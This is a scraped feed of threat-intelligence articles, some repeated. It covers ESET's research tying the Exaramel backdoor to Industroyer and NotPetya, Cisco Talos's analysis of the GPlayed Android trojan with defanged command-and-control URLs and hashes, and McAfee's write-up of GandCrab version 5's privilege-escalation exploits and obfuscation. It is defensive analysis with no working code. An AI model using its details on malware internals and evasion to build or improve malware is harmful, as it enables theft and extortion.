“In June 2017, when many large corporations worldwide were hit by the Diskcoder.C ransomware (aka Petya and NotPetya)  – most probably as unintended collateral damage – we discovered that the outbreak started spreading from companies afflicted with a TeleBots backdoor, resulting from the compromise of the popular financial software M.E.Doc.”

Telebots Industroyer Exaramel

The NotPetya Wiper was linked by experts to BlackEnergy and the KillDisk malware that was used the 2015 attack in Ukraine.

In April 2018, ESET discovered a new backdoor tracked as Exaramel that definitively links Industroyer to TeleBots.

Researchers noticed that the configuration data  in XML format written by the dropper of Exaramel in the Windows registry includes the security solution used on the compromised system, something similar with Industroyer.

“the attackers are grouping their targets based on the security solutions in use. Similar behavior can be found in the Industroyer toolset – specifically some of the Industroyer backdoors were also disguised as an AV-related service (deployed under the name avtask.exe) and used the same grouping.” continues the analysis.

Experts also found many similarities in the code used for the implementation of the commands in the Exaramel malware and a backdoor from the Industroyer toolset.

Both malware relies on a report file for storing the result output of executed shell commands and launched processes.

The main difference between the backdoor from the Industroyer toolset and the Exaramel backdoor is that the latter uses XML format for communication and configuration instead of a custom binary format.

“Along with the Exaramel backdoor, Telebots group uses some of their old tools, including a password stealer (internally referred as CredRaptor or PAI by the attackers) and a slightly-modified Mimikatz.” continues the analysis.

“The CredRaptor custom password-stealer tool, exclusively used by this group since 2016, has been slightly improved. Unlike previous versions, it collects saved passwords not only from browsers, but also from Outlook and many FTP clients.”

ESET observed only one attack based on the Exaramel that targeted an organization in Ukraine, experts also discovered a Linux backdoor, racked as Linux/Exaramel.A.

“The discovery of Exaramel shows that the TeleBots group is still active in 2018 and the attackers keep improving their tools and tactics.” concludes ESET.

“The strong code similarity between the Win32/Exaramel backdoor and the Industroyer main backdoor is the first publicly presented evidence linking Industroyer to TeleBots, and hence to NotPetya and BlackEnergy. While the possibility of false flags – or a coincidental code sharing by another threat actor – should always be kept in mind when attempting attribution, in this case we consider it unlikely.”

Pierluigi Paganini

(Security Affairs – instant messaging, hacking)

 

The post Exaramel Malware Links Industroyer ICS malware and NotPetya wiper appeared first on Security Affairs.



Security Affairs

Exaramel Malware Links Industroyer ICS malware and NotPetya wiper

ESET researchers have spotted a new strain of malware tracked as Exaramel that links the dreaded not Petya wiper to the Industroyer ICS malware.

A few months ago, researchers from ESET discovered a new piece of malware that further demonstrates the existence of a link between Industroyer and the NotPetya wiper.

In June 2017, researchers at antivirus firm ESET discovered a new strain of malware, dubbed Industroyer, that was designed to target power grids.

Industroyer was involved in the December 2016 attack aimed at an electrical substation in Ukraine that caused significant power outages.

Industroyer is the fourth malware specifically designed to target ICS systems, threats previously discovered by security experts are StuxnetBlackEnergy, and Havex.

Now experts found a link between the 2016 Industroyer attack and Russia-linked APT groups tracked as BlackEnergy, TeleBots, Sandworm, and Electrum.

“That said, we have observed and documented ties between the BlackEnergy attacks – not only those against the Ukrainian power grid but against various sectors and high-value targets – and a series of campaigns (mostly) against the Ukrainian financial sector by the TeleBots group.” reads the analysis published by ESET.

“In June 2017, when many large corporations worldwide were hit by the Diskcoder.C ransomware (aka Petya and NotPetya)  – most probably as unintended collateral damage – we discovered that the outbreak started spreading from companies afflicted with a TeleBots backdoor, resulting from the compromise of the popular financial software M.E.Doc.”

Telebots Industroyer Exaramel

The NotPetya Wiper was linked by experts to BlackEnergy and the KillDisk malware that was used the 2015 attack in Ukraine.

In April 2018, ESET discovered a new backdoor tracked as Exaramel that definitively links Industroyer to TeleBots.

Researchers noticed that the configuration data  in XML format written by the dropper of Exaramel in the Windows registry includes the security solution used on the compromised system, something similar with Industroyer.

“the attackers are grouping their targets based on the security solutions in use. Similar behavior can be found in the Industroyer toolset – specifically some of the Industroyer backdoors were also disguised as an AV-related service (deployed under the name avtask.exe) and used the same grouping.” continues the analysis.

Experts also found many similarities in the code used for the implementation of the commands in the Exaramel malware and a backdoor from the Industroyer toolset.

Both malware relies on a report file for storing the result output of executed shell commands and launched processes.

The main difference between the backdoor from the Industroyer toolset and the Exaramel backdoor is that the latter uses XML format for communication and configuration instead of a custom binary format.

“Along with the Exaramel backdoor, Telebots group uses some of their old tools, including a password stealer (internally referred as CredRaptor or PAI by the attackers) and a slightly-modified Mimikatz.” continues the analysis.

“The CredRaptor custom password-stealer tool, exclusively used by this group since 2016, has been slightly improved. Unlike previous versions, it collects saved passwords not only from browsers, but also from Outlook and many FTP clients.”

ESET observed only one attack based on the Exaramel that targeted an organization in Ukraine, experts also discovered a Linux backdoor, racked as Linux/Exaramel.A.

“The discovery of Exaramel shows that the TeleBots group is still active in 2018 and the attackers keep improving their tools and tactics.” concludes ESET.

“The strong code similarity between the Win32/Exaramel backdoor and the Industroyer main backdoor is the first publicly presented evidence linking Industroyer to TeleBots, and hence to NotPetya and BlackEnergy. While the possibility of false flags – or a coincidental code sharing by another threat actor – should always be kept in mind when attempting attribution, in this case we consider it unlikely.”

Pierluigi Paganini

(Security Affairs – instant messaging, hacking)

 

The post Exaramel Malware Links Industroyer ICS malware and NotPetya wiper appeared first on Security Affairs.

Researchers link Industroyer to NotPetya

ESET researchers believe they have found evidence that the TeleBots APT was behind the December 2016 attacks against the Ukraine energy sector that resulted in blackouts throughout the country: a backdoor dubbed Exaramel. The missing evidence With APT groups and the malware they deploy getting named differently by the various AV vendors, it’s sometimes difficult to follow the connections. This diagram shared by the researchers can help:

The post Researchers link Industroyer to NotPetya appeared first on Help Net Security.

GPlayed Trojan – .Net playing with Google Market

This blog post is authored by Vitor Ventura.

Introduction

In a world where everything is always connected, and mobile devices are involved in individuals' day-to-day lives more and more often, malicious actors are seeing increased opportunities to attack these devices. Cisco Talos has identified the latest attempt to penetrate mobile devices — a new Android trojan that we have dubbed "GPlayed." This is a trojan with many built-in capabilities. At the same time, it's extremely flexible, making it a very effective tool for malicious actors. The sample we analyzed uses an icon very similar to Google Apps, with the label "Google Play Marketplace" to disguise itself.

The malicious application is on the left-hand side.



What makes this malware extremely powerful is the capability to adapt after it's deployed. In order to achieve this adaptability, the operator has the capability to remotely load plugins, inject scripts and even compile new .NET code that can be executed. Our analysis indicates that this trojan is in its testing stage but given its potential, every mobile user should be aware of GPlayed. Mobile developers have recently begun eschewing traditional app stores and instead want to deliver their software directly through their own means. But GPlayed is an example of where this can go wrong, especially if a mobile user is not aware of how to distinguish a fake app versus a real one.

Trojan architecture and capabilities

This malware is written in .NET using the Xamarin environment for mobile applications. The main DLL is called "Reznov.DLL." This DLL contains one root class called "eClient," which is the core of the trojan. The imports reveal the use of a second DLL called "eCommon.dll." We determined that the "eCommon" file contains support code and structures that are platform independent. The main DLL also contains eClient subclasses that implement some of the native capabilities.

The package certificate is issued under the package name, which also resembles the name of the main DLL name.

Certificate information

The Android package is named "verReznov.Coampany." The application uses the label "Installer" and its name is "android.app.Application."

Package permissions

The trojan declares numerous permissions in the manifest, from which we should highlight the BIND_DEVICE_ADMIN, which provides nearly full control of the device to the trojan.

This trojan is highly evolved in its design. It has modular architecture implemented in the form of plugins, or it can receive new .NET source code, which will be compiled on the device in runtime.

Initialization of the compiler object

The plugins can be added in runtime, or they can be added as a package resource at packaging time. This means that the authors or the operators can add capabilities without the need to recompile and upgrade the trojan package on the device.

Trojan native capabilities

This is a full-fledged trojan with capabilities ranging from those of a banking trojan to a full spying trojan. This means that the malware can do anything from harvest the user's banking credentials, to monitoring the device's location. There are several indicators (see section "trojan activity" below) that it is in its last stages of development, but it has the potential to be a serious threat.

Trojan details

Upon boot, the trojan will start by populating a shared preferences file with the configuration it has on its internal structures. Afterward, it will start several timers to execute different tasks. The first timer will be fired on the configured interval (20 seconds in this case), pinging the command and control (C2) server. The response can either be a simple "OK," or can be a request to perform some action on the device. The second timer will run every five seconds and it will try to enable the WiFi if it's disabled. The third timer will fire every 10 seconds and will attempt to register the device into the C2 and register wake-up locks on the system to control the device's status.

During the trojan registration stage, the trojan exfiltrates private information such as the phone's model, IMEI, phone number and country. It will also report the version of Android that the phone is running and any additional capabilities.

Device registration

This is the last of the three main timers that are created. The trojan will register the SMS handler, which will forward the contents and the sender of all of the SMS messages on the phone to the C2.

The final step in the trojan's initialization is the escalation and maintenance of privileges in the device. This is done both by requesting admin privileges on the device and asking the user to allow the application to access the device's settings.

Privilege escalation requests

The screens asking for the user's approval won't close unless the user approves the privilege escalation. If the user closes the windows, they will appear again due to the timer configuration.

After the installation of the trojan, it will wait randomly between three and five minutes to activate one of the native capabilities — these are implemented on the eClient subclass called "GoogleCC." This class will open a WebView with a Google-themed page asking for payment in order to use the Google services. This will take the user through several steps until it collects all the necessary credit card information, which will be checked online and exfiltrated to the C2. During this process, an amount of money, configured by the malicious operator, is requested to the user.

Steps to request the user's credit card information

In our sample configuration, the request for the views above cannot be canceled or removed from the screen — behaving just like a screen lock that won't be disabled without providing credit card information.

All communication with the C2 is done over HTTP. It will use either a standard web request or it will write data into a web socket if the first method fails. The C2 can also use WebSocket as a backup communication channel.

Before sending any data to the C2 using the trojan attempts to disguise its data, the data is serialized using JSON, which is then encoded in Base64. However, the trojan replaces the '=' by 'AAAZZZXXX', the '+' by '|' and the '/' by '.' to disguise the Base64.

Request encoding process

The HTTP requests follow the format below, while on the WebSocket only the query data is written.

<server path>?q=<IMEI>-<REQUEST CODE>:<Obfuscated Base64 encoded data>

As is common with trojans, the communication is always initiated by the trojan on the device to the C2. The request codes are actually replies to the C2 action requests, which are actually called "responses." There are 27 response codes that the C2 can use to make requests to the trojan, which pretty much match what's listed in the capabilities section.
  • Error
  • Registration
  • Ok
  • Empty
  • SendSMS
  • RequestGoogleCC
  • Wipe
  • OpenBrowser
  • SendUSSD
  • RequestSMSList
  • RequestAppList
  • RequestLocation
  • ShowNotification
  • SetLockPassword
  • LockNow
  • MuteSound
  • LoadScript
  • LoadPlugin
  • ServerChange
  • StartApp
  • CallPhone
  • SetPingTimer
  • SMSBroadcast
  • RequestContacts
  • AddInject
  • RemoveInject
  • Evaluate
Another feature of this trojan is the ability to register injects, which are JavaScript snippets of code. These will be executed in a WebView object created by the trojan. This gives the operators the capability to trick the user into accessing any site while stealing the user's cookies or forging form fields, like account numbers or phone numbers.

Trojan activity

At the time of the writing of this post, all URLs (see IOC section) found on the sample were inactive, and it does not seem to be widespread. There are some indicators that this sample is just a test sample on its final stages of development. There are several strings and labels still mentioning 'test' or 'testcc' — even the URL used for the credit card data exfiltration is named "testcc.php."

Debug information on logcat

Another indicator is the amount of debugging information the trojan is still generating — a production-level trojan would keep its logging to a minimum.

The only sample was found on public repositories and almost seemed to indicate a test run to determine the detection ratio of the sample. We have observed this trojan being submitted to public antivirus testing platforms, once as a package and once for each DLL to determine the detection ratio. The sample analyzed was targeted at Russian-speaking users, as most of the user interaction pages are written in Russian. However, given the way the trojan is built, it is highly customizable, meaning that adapting it to a different language would be extremely easy. The wide range of capabilities doesn't limit this trojan to a specific malicious activity like a banking trojan or a ransomware. This makes it impossible to create a target profile.

Conclusion

This trojan shows a new path for threats to evolve. Having the ability to move code from desktops to mobile platforms with no effort, like the eCommon.DLL demonstrates that malicious actors can create hybrid threats faster and with fewer resources involved than ever before. This trojan's design and implementation is of an uncommonly high level, making it a dangerous threat. These kinds of threats will become more common, as more and more companies decide to publish their software directly to consumers.

There have been several recent examples of companies choosing to release their software directly to consumers, bypassing traditional storefronts. The average user might not have the necessary skills to distinguish legitimate sites from malicious ones. We've seen that this has been the case for many years with spear-phishing campaigns on desktop and mobile platforms, so, unfortunately, it doesn't seem that this will change any time soon. And this just means attackers will continue to be successful.

Coverage

Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of compromise (IOC)


URLs
hxxp://5.9.33.226:5416
hxxp://172.110.10.171:85/testcc.php
hxxp://sub1.tdsworker.ru:5555/3ds/

Hash values
Package.apk - A342a16082ea53d101f556b50532651cd3e3fdc7d9e0be3aa136680ad9c6a69f
eCommon.dl - 604deb75eedf439766896f05799752de268baf437bf89a7185540627ab4a4bd1
Reznov.dll - 17b8665cdbbb94482ca970a754d11d6e29c46af6390a2d8e8193d8d6a527dec3

Custom activity prefix
com.cact.CAct

Top cybersecurity facts, figures and statistics for 2018

Looking for hard numbers to back up your sense of what’s happening in the cybersecurity world? We dug into studies and surveys of the industry’s landscape to get a sense

The post Top cybersecurity facts, figures and statistics for 2018 appeared first on The Cyber Security Place.

McAfee Blogs: Rapidly Evolving Ransomware GandCrab Version 5 Partners With Crypter Service for Obfuscation

The GandCrab ransomware, which first appeared in January, has been updated rapidly during its short life, with Version 5.0.2 appearing this month. In this post we will examine the latest version and how the authors have improved the code (and in some cases have made mistakes). McAfee gateway and endpoint products are able to protect customers from known variants of this threat.

The GandCrab authors have moved quickly to improve the code and have added comments to provoke the security community, law enforcement agencies, and the NoMoreRansom organization. Despite the agile approach of the developers, the coding is not professional and bugs usually remain in the malware (even in Version 5.0.2), but the speed of change is impressive and increases the difficulty of combating it.

The group behind GandCrab has achieved cult status in underground forums; the authors are undoubtedly confident and have strong marketing skills, but flawless programming is not one of their strengths.

Underground alliances

On September 27, the GandCrab crew announced Version 5 with the same showmanship as its earlier versions. GandCrab ransomware has gained a lot of attention from security researchers as well as the underground. The developers market the affiliate program like a “members-only club” and new affiliates are lining up to join, in the hope of making easy money through the large-scale ransomware extortion scheme.

The prospect of making money not only attracts new affiliates, but also leads to the formation of new alliances between GandCrab and other criminal services that strengthen the malware’s supply and distribution networks. One of these alliances became obvious during Version 4, in which the ransomware started being distributed through the new Fallout exploit kit. This alliance was again emphasized in the GandCrab Version 5 announcement, as the GandCrab crew openly endorsed FalloutEK.

The GandCrab Version 5 announcement.

With Version 5, yet another alliance with a criminal service has been formed. The malware crypter service NTCrypt announced that it is partnering with the GandCrab crew. A crypter service provides malware obfuscation to evade antimalware security products.

The NTCrypt-GandCrab partnership announcement offering a special price for GandCrab users.

The partnership between GandCrab and NTCrypt was established in a novel way. At the end of September, the GandCrab crew started a “crypt competition” on a popular underground forum to find a new crypter service they could partner with. NTCrypt applied and eventually won the competition.

The “crypt competition” announcement.

This novel approach emphasizes once more the cult status GandCrab has in the underground community. For a criminal business such as GandCrab, building these alliances makes perfect sense: They increase the ease of operation and a trusted affiliate network minimizes their risk exposure by allowing them to avoid less-trusted suppliers and distributors.

For the security community it is worrisome to see that GandCrab’s aggressive marketing strategy seems to be paying off. It is generating a strong influx of criminal interest and allows the GandCrab crew to form alliances with other essential services in the cybercriminal supply chain.

GandCrab overview

GandCrab Version 5 uses several mechanisms to infect systems. The following diagram shows an overview of GandCrab’s behavior.

GandCrab Version 5 Infection

Entry vector

GandCrab uses several entry vectors:

  • Remote desktop connections with weak security or bought in underground forums
  • Phishing emails with links or attachments
  • Trojanized legitimate programs containing the malware, or downloading and launching it
  • Exploits kits such as RigEK and others such as FalloutEK
  • PowerShell scripts or within the memory of the PowerShell process (the later mainly in Version 5.0.2)
  • Botnets such as Phorpiex (an old botnet that spread not only this malware but many others)

The goal of GandCrab, as with other ransomware, is to encrypt all or many files on an infected system and insist on payment to unlock them. The developer requires payment in cryptocurrency, primarily Dash (or Bitcoin in some older versions), because it is complex to track and quick to receive the payment.

The malware is usually, but not always, packed. We have seen variants in .exe format (the primary form) along with DLLs. GandCrab is effectively ransomware as a service; its operators can choose which version they want.

Version 5.0

This version has two releases. The first works only on Windows 7 or later due to a big mistake in the compiling time. Version 5.0 carries two exploits that try to elevate privileges. It checks the version of the operating system and the TokenIntegrityLevel class of the process. If the SID Subauthority is SECURITY_MANDATORY_LOW_RID (0x1000), it tries to execute the exploits if it also passed one previous check of a mutex value.

One release is the exploit released in August on Twitter and GitHub by the hacker “SandboxEscaper.” The original can be found at this link. The Twitter handle for this hacker is https://twitter.com/sandboxescaper.

This exploit tries to use a problem with the Task System in Windows when the operating system improperly handles calls to an advanced local procedure call.

The GandCrab authors claim there is no CVE of this exploit, but that is incorrect. It falls under CVE-2018-8440. This exploit can affect versions Windows 7 through Windows 10 Server. More information about this exploit can be found at this link.

In the first release of Version 5.0, the malware authors wrote the code exploit using normal calls to the functions. Thus at compiling time the binary has the IAT filled with the DLL needed for some calls. This DLL does not exist in Windows Vista and XP, so the malware fails to run in these systems, showing an error.

Import of xpsprint.dll that will not run on Windows XP or Vista.

The exploit using direct calls.

This release published an HTML file after encrypting the user’s files, but this file was faulty because it did not always have the information needed to decrypt the user’s files.

The second release uses dynamic calls and obfuscates the strings of the exploit, as shown in the previous image. (Earlier they were in plain text.)

The exploit with dynamic calls and obfuscated strings.

The second exploit is covered under CVE-2018-8120, which in Windows 7, Windows Server 2008 R2 and Windows Server 2008 allows an elevation of privileges from the kernel. Thanks to a faulty object in the token of the System process, changing this token in the malware results in executing the malware with System privileges.

Executing the exploit CVE-2018-8120.

You can read more about this exploit on mcafee.com.

The malware checks the version of the operating system and type of user and whether it can get the token elevation information of its own process before employing the use of exploits. In some cases, it fails to infect. For example, in Windows XP the second release of Version 5 runs but does not encrypt the files. (We thank fellow researcher Yassine Lemmou, who shared this information with us.)

We and Lemmou know where the problem is in Version 5.0.2. A few changes to the registry could make the malware run correctly, but we do not want to help the malware authors fix their product. Even though GandCrab’s authors quickly repair mistakes as they are pointed out, they still fail to find some of the basic errors by themselves. (McAfee has had no contact with GandCrab’s developers.)

The second release writes a random extension of five letters instead of using the normal .CRAB or .KRAB extension seen in previous versions. The malware keeps this information as binary data in a new registry entry in the subkey “ext_data\data” and in the value entry of “ext.”

A new registry entry to hold the random extension.

The malware tries creating this new entry in the root key of HKEY_LOCAL_MACHINE. If it cannot—for example, because the user does not have admin rights—it places the entry in the root key HKEY_CURRENT_USER. This entry is deleted in some samples after the files have been encrypted.

Version 5.0.1

This version fixed some internal bugs in the malware but made no other notable changes.

Version 5.0.2

This version changes the random extension length from 5 to 10 characters and fixes some internal bugs. Other bugs remain, however, meaning files cannot always be encrypted.

The latest

This section is based on the latest version of the malware (Version 5.0.2 on October 4), though some elements appear in earlier releases of Version 5. Starting with this version, the malware uses two exploits to try to elevate privileges in the system.

The first exploit uses a dynamic call to the function IsWoW64Process to detect whether the operating system is running in 32 or 64 bits.

The dynamic call to IsWoW64Process with obfuscated strings.

Depending on the result, the malware has two embedded DLLs, encrypted with a simple operation XOR 0x18.

Decrypting the DLL to load with the exploit and fix the header.

The malware authors use a clever trick with fuzzing to avoid detection: The first two bytes of the DLL are trash, something that is later fixed, as we see in the preceding image.

After decryption and loading the exploit, this DLL creates a mutex in the system and some pipes to communicate with the main malware. The malware creates a pipe that the DLL reads later and prepares strings as the mutex string for the DLL.

Preparing the string for the DLL.

The DLL has dummy strings for these strings.

Creating the new mutex and relaunching the process.

This mutex is checked when the malware starts. The function returns a 1 or 0, depending on whether it can open the mutex. Later, this result is checked and if the mutex can be opened the malware will avoid checking the version and will not use the two new exploits to elevate privileges.

Opening the new mutex to check if there is a need to run the exploits.

As with GandCrab Version 4.x and later, the malware later checks the version. If it is Vista or later, it tries to get the “TokenIntegrityLevel” class and relaunch the binary to elevate its privilege with a call to “ShellExecuteExW” with the “runas” application. If the system is Windows XP, the code will avoid that and continue in its normal flow.

This mutex is never created for the main malware; it is created for the DLL loaded using the exploit. To better understand this explanation, this IDA snippet may help:

Explaining the check of mutex and exploits.

This version changes the desktop wallpaper, which is created at runtime and is filled with the extension generated to encrypt the files. (The ransom note text or HTML has the name: <extension_in_uppercase>_DECRYPT. <txt|html>) and the user name of the machine.)

Creating the new wallpaper at runtime.

The username is checked with “SYSTEM.” If the user is “SYSTEM,” the malware puts the name “USER” in the wallpaper.

Checking the name of the user for the wallpaper.

The wallpaper is created in the %TEMP% folder with the name pidor.bmp.

Creating the wallpaper in the temp folder.

Here is an example of strings used in the wallpaper name and to check the name of the user and the format string, whether it is another user, or the final string in the case of SYSTEM user with USER in uppercase.

The name of the wallpaper and special strings.

Finally, the wallpaper is set for any user other than SYSTEM:

Changing the wallpaper.

The malware detects the language of the system and decrypts the strings and writes the correct ransom note in the language of the system.

Coverage

Customers of McAfee gateway and endpoint products are protected against the latest GandCrab versions. Detection names include Ran-Gandcrabv4! and many others.

An independent researcher, Twitter user Valthek, has also created several vaccines. (McAfee has verified that these vaccines are effective.) The version for GandCrab 4.x through 5.0.2 can prevent the files from being encrypted.

For Version 4.x, the deletion of shadow volumes cannot be avoided but at least the files themselves are kept safe.

For Version 5.x, encrypting the files can be avoided but not the creation and changing of the wallpaper, which the malware will still corrupt. The malware cannot create random extensions to encrypt the files but will prepare the string. Running the vaccine a second time removes the wallpaper if it is in the %TEMP% folder.

The vaccine has versions with and without persistence. The version with persistence creates a random filename in a special folder and writes a special random entry in the registry to run each time with the system. In this case, the machine will always be protected against this malware (at least in its current state of October 10, and perhaps in the future).

 

Indicators of compromise

These samples use the following MITRE ATT&CK™ techniques:

  • File deletion
  • System information discovery
  • Execution through API
  • Execution through WMIC
  • Application process discovery: to detect antimalware and security products as well as normal programs
  • Query registry: to get information about keys that the malware needs to create or read
  • Modify registry
  • File and directory discovery: to search for files to encrypt
  • Discovery of network shares to encrypt them
  • Encrypt files
  • Process discovery: enumerating all processes on the endpoint to kill some special ones
  • Create files
  • Elevation of privileges
  • Change wallpaper
  • Flood the network with connections
  • Create mutants

Hashes 

  • e168e9e0f4f631bafc47ddf23c9848d7: Version 5.0
  • 6884e3541834cc5310a3733f44b38910: Version 5.0 DLL
  • 2d351d67eab01124b7189c02cff7595f: Version 5.0.2
  • 41c673415dabbfa63905ff273bdc34e9: Version 5.0.2
  • 1e8226f7b587d6cd7017f789a96c4a65: DLL for 32-bit exploit
  • fb25dfd638b1b3ca042a9902902a5ff9: DLL for 64-bit exploit
  • df1a09dd1cc2f303a8b3d5097e53400b: botnet related to the malware (IP 92.63.197.48)

 

The post Rapidly Evolving Ransomware GandCrab Version 5 Partners With Crypter Service for Obfuscation appeared first on McAfee Blogs.



McAfee Blogs

Rapidly Evolving Ransomware GandCrab Version 5 Partners With Crypter Service for Obfuscation

The GandCrab ransomware, which first appeared in January, has been updated rapidly during its short life, with Version 5.0.2 appearing this month. In this post we will examine the latest version and how the authors have improved the code (and in some cases have made mistakes). McAfee gateway and endpoint products are able to protect customers from known variants of this threat.

The GandCrab authors have moved quickly to improve the code and have added comments to provoke the security community, law enforcement agencies, and the NoMoreRansom organization. Despite the agile approach of the developers, the coding is not professional and bugs usually remain in the malware (even in Version 5.0.2), but the speed of change is impressive and increases the difficulty of combating it.

The group behind GandCrab has achieved cult status in underground forums; the authors are undoubtedly confident and have strong marketing skills, but flawless programming is not one of their strengths.

Underground alliances

On September 27, the GandCrab crew announced Version 5 with the same showmanship as its earlier versions. GandCrab ransomware has gained a lot of attention from security researchers as well as the underground. The developers market the affiliate program like a “members-only club” and new affiliates are lining up to join, in the hope of making easy money through the large-scale ransomware extortion scheme.

The prospect of making money not only attracts new affiliates, but also leads to the formation of new alliances between GandCrab and other criminal services that strengthen the malware’s supply and distribution networks. One of these alliances became obvious during Version 4, in which the ransomware started being distributed through the new Fallout exploit kit. This alliance was again emphasized in the GandCrab Version 5 announcement, as the GandCrab crew openly endorsed FalloutEK.

The GandCrab Version 5 announcement.

With Version 5, yet another alliance with a criminal service has been formed. The malware crypter service NTCrypt announced that it is partnering with the GandCrab crew. A crypter service provides malware obfuscation to evade antimalware security products.

The NTCrypt-GandCrab partnership announcement offering a special price for GandCrab users.

The partnership between GandCrab and NTCrypt was established in a novel way. At the end of September, the GandCrab crew started a “crypt competition” on a popular underground forum to find a new crypter service they could partner with. NTCrypt applied and eventually won the competition.

The “crypt competition” announcement.

This novel approach emphasizes once more the cult status GandCrab has in the underground community. For a criminal business such as GandCrab, building these alliances makes perfect sense: They increase the ease of operation and a trusted affiliate network minimizes their risk exposure by allowing them to avoid less-trusted suppliers and distributors.

For the security community it is worrisome to see that GandCrab’s aggressive marketing strategy seems to be paying off. It is generating a strong influx of criminal interest and allows the GandCrab crew to form alliances with other essential services in the cybercriminal supply chain.

GandCrab overview

GandCrab Version 5 uses several mechanisms to infect systems. The following diagram shows an overview of GandCrab’s behavior.

GandCrab Version 5 Infection

Entry vector

GandCrab uses several entry vectors:

  • Remote desktop connections with weak security or bought in underground forums
  • Phishing emails with links or attachments
  • Trojanized legitimate programs containing the malware, or downloading and launching it
  • Exploits kits such as RigEK and others such as FalloutEK
  • PowerShell scripts or within the memory of the PowerShell process (the later mainly in Version 5.0.2)
  • Botnets such as Phorpiex (an old botnet that spread not only this malware but many others)

The goal of GandCrab, as with other ransomware, is to encrypt all or many files on an infected system and insist on payment to unlock them. The developer requires payment in cryptocurrency, primarily Dash (or Bitcoin in some older versions), because it is complex to track and quick to receive the payment.

The malware is usually, but not always, packed. We have seen variants in .exe format (the primary form) along with DLLs. GandCrab is effectively ransomware as a service; its operators can choose which version they want.

Version 5.0

This version has two releases. The first works only on Windows 7 or later due to a big mistake in the compiling time. Version 5.0 carries two exploits that try to elevate privileges. It checks the version of the operating system and the TokenIntegrityLevel class of the process. If the SID Subauthority is SECURITY_MANDATORY_LOW_RID (0x1000), it tries to execute the exploits if it also passed one previous check of a mutex value.

One release is the exploit released in August on Twitter and GitHub by the hacker “SandboxEscaper.” The original can be found at this link. The Twitter handle for this hacker is https://twitter.com/sandboxescaper.

This exploit tries to use a problem with the Task System in Windows when the operating system improperly handles calls to an advanced local procedure call.

The GandCrab authors claim there is no CVE of this exploit, but that is incorrect. It falls under CVE-2018-8440. This exploit can affect versions Windows 7 through Windows 10 Server. More information about this exploit can be found at this link.

In the first release of Version 5.0, the malware authors wrote the code exploit using normal calls to the functions. Thus at compiling time the binary has the IAT filled with the DLL needed for some calls. This DLL does not exist in Windows Vista and XP, so the malware fails to run in these systems, showing an error.

Import of xpsprint.dll that will not run on Windows XP or Vista.

The exploit using direct calls.

This release published an HTML file after encrypting the user’s files, but this file was faulty because it did not always have the information needed to decrypt the user’s files.

The second release uses dynamic calls and obfuscates the strings of the exploit, as shown in the previous image. (Earlier they were in plain text.)

The exploit with dynamic calls and obfuscated strings.

The second exploit is covered under CVE-2018-8120, which in Windows 7, Windows Server 2008 R2 and Windows Server 2008 allows an elevation of privileges from the kernel. Thanks to a faulty object in the token of the System process, changing this token in the malware results in executing the malware with System privileges.

Executing the exploit CVE-2018-8120.

You can read more about this exploit on mcafee.com.

The malware checks the version of the operating system and type of user and whether it can get the token elevation information of its own process before employing the use of exploits. In some cases, it fails to infect. For example, in Windows XP the second release of Version 5 runs but does not encrypt the files. (We thank fellow researcher Yassine Lemmou, who shared this information with us.)

We and Lemmou know where the problem is in Version 5.0.2. A few changes to the registry could make the malware run correctly, but we do not want to help the malware authors fix their product. Even though GandCrab’s authors quickly repair mistakes as they are pointed out, they still fail to find some of the basic errors by themselves. (McAfee has had no contact with GandCrab’s developers.)

The second release writes a random extension of five letters instead of using the normal .CRAB or .KRAB extension seen in previous versions. The malware keeps this information as binary data in a new registry entry in the subkey “ext_data\data” and in the value entry of “ext.”

A new registry entry to hold the random extension.

The malware tries creating this new entry in the root key of HKEY_LOCAL_MACHINE. If it cannot—for example, because the user does not have admin rights—it places the entry in the root key HKEY_CURRENT_USER. This entry is deleted in some samples after the files have been encrypted.

Version 5.0.1

This version fixed some internal bugs in the malware but made no other notable changes.

Version 5.0.2

This version changes the random extension length from 5 to 10 characters and fixes some internal bugs. Other bugs remain, however, meaning files cannot always be encrypted.

The latest

This section is based on the latest version of the malware (Version 5.0.2 on October 4), though some elements appear in earlier releases of Version 5. Starting with this version, the malware uses two exploits to try to elevate privileges in the system.

The first exploit uses a dynamic call to the function IsWoW64Process to detect whether the operating system is running in 32 or 64 bits.

The dynamic call to IsWoW64Process with obfuscated strings.

Depending on the result, the malware has two embedded DLLs, encrypted with a simple operation XOR 0x18.

Decrypting the DLL to load with the exploit and fix the header.

The malware authors use a clever trick with fuzzing to avoid detection: The first two bytes of the DLL are trash, something that is later fixed, as we see in the preceding image.

After decryption and loading the exploit, this DLL creates a mutex in the system and some pipes to communicate with the main malware. The malware creates a pipe that the DLL reads later and prepares strings as the mutex string for the DLL.

Preparing the string for the DLL.

The DLL has dummy strings for these strings.

Creating the new mutex and relaunching the process.

This mutex is checked when the malware starts. The function returns a 1 or 0, depending on whether it can open the mutex. Later, this result is checked and if the mutex can be opened the malware will avoid checking the version and will not use the two new exploits to elevate privileges.

Opening the new mutex to check if there is a need to run the exploits.

As with GandCrab Version 4.x and later, the malware later checks the version. If it is Vista or later, it tries to get the “TokenIntegrityLevel” class and relaunch the binary to elevate its privilege with a call to “ShellExecuteExW” with the “runas” application. If the system is Windows XP, the code will avoid that and continue in its normal flow.

This mutex is never created for the main malware; it is created for the DLL loaded using the exploit. To better understand this explanation, this IDA snippet may help:

Explaining the check of mutex and exploits.

This version changes the desktop wallpaper, which is created at runtime and is filled with the extension generated to encrypt the files. (The ransom note text or HTML has the name: <extension_in_uppercase>_DECRYPT. <txt|html>) and the user name of the machine.)

Creating the new wallpaper at runtime.

The username is checked with “SYSTEM.” If the user is “SYSTEM,” the malware puts the name “USER” in the wallpaper.

Checking the name of the user for the wallpaper.

The wallpaper is created in the %TEMP% folder with the name pidor.bmp.

Creating the wallpaper in the temp folder.

Here is an example of strings used in the wallpaper name and to check the name of the user and the format string, whether it is another user, or the final string in the case of SYSTEM user with USER in uppercase.

